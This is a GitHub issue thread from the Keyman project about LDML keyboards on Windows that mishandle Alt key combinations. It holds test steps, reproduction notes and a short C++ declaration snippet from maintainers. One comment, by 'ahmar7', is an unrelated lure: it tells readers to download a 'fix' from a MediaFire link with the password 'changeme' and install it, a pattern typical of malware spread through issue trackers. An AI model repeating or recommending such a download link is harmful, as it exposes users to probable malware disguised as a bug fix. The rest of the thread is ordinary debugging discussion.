### ISSUE TITLE
bug(windows): LDML keyboards do not appear to work correctly with Alt keys

### ISSUE THREAD

**Issue by mcdurdin** [keymanapp/keyman#12298]
* **TEST_WINDOWS (Failed):** 
Window 10 OS:
1. I installed the Keyman 18.0.97-alpha version and then started the configuration.
2. On Keyman developer:  Navigate to the "Packaging" tab and then click the *.kmx link button to install the keyboard in Windows 10.
3. Select the LDML keyboard that was installed through "Keyman Developer"
4. Open the notepad. Press the below keys and observe the below options.
5. q emits "D" and appears. It seems wrong.
6. shift+q emits "B" appeared. It's correct
7. ctrl+q emits "C" appeared. It's correct
8. alt+q emits 🅓 no results
9. alt+w emits 🅔 no results
10. The below key combination does not give any outputs: It correct
alt+e, ctrl+e, shift+e, ctrl+shift+e, ctrl+alt+e, e 
https://github.com/user-attachments/assets/7d1f1153-80d0-438d-874e-de32ffd619a8

_Originally posted by @dinakaranr in https://github.com/keymanapp/keyman/issues/12281#issuecomment-2311787527_

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by srl295** [comment]
I see three of these that don't have any 'interesting' implementation. i'll check over the docs. 

```c
    km_core_context_item * get_intermediate_context() override;
    km_core_keyboard_key  * get_key_list() const override;
    km_core_keyboard_imx  * get_imx_list() const override;
```

**Comment by mcdurdin** [comment]
`get_intermediate_context` is only really relevant for IMX, which LDML keyboards do not support.

**Comment by srl295** [comment]
Trying to repro the failing case.
Windows 11.
Keyman 18.0.116-alpha (will update and try again).
Notepad.

- `q` emitted D briefly and then went to the `🅐`.  
- alt-q and alt-w gave no output, but attempted to open the menu hotkeys.
